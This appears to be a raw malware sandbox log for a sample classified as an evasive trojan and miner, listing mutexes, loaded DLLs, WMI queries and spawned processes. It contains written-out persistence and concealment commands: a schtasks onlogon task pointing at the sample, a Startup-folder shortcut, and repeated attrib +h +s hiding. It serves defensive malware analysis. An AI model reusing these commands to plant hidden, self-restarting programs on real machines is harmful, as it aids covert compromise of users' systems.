                            Source: autoit3.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: windows photo viewer.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: windows photo viewer.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: google.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: google.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@72/47@0/1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3u8A2xjbBT.lnkJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2144:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4944:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6140:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_03
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5668:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4328:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1964:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:316:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2176:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1228:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2092:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2352:120:WilError_03
                            Source: 3u8A2xjbBT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: 3u8A2xjbBT.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: 3u8A2xjbBT.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile read: C:\Users\user\Desktop\3u8A2xjbBT.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\3u8A2xjbBT.exe "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "3u8A2xjbBT"
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "3u8A2xjbBT" /tr "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\user\Desktop\3u8A2xjbBT.exe C:\Users\user\Desktop\3u8A2xjbBT.exe
                            Source: unknownProcess created: C:\Users\user\Desktop\3u8A2xjbBT.exe "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "3u8A2xjbBT"
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "3u8A2xjbBT"
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "3u8A2xjbBT"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "3u8A2xjbBT" /tr "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "3u8A2xjbBT"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "3u8A2xjbBT"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: amsi.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: userenv.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: sxs.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mpr.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: scrrun.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: propsys.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: linkinfo.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rasman.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ondemandconnroutehelper.dll
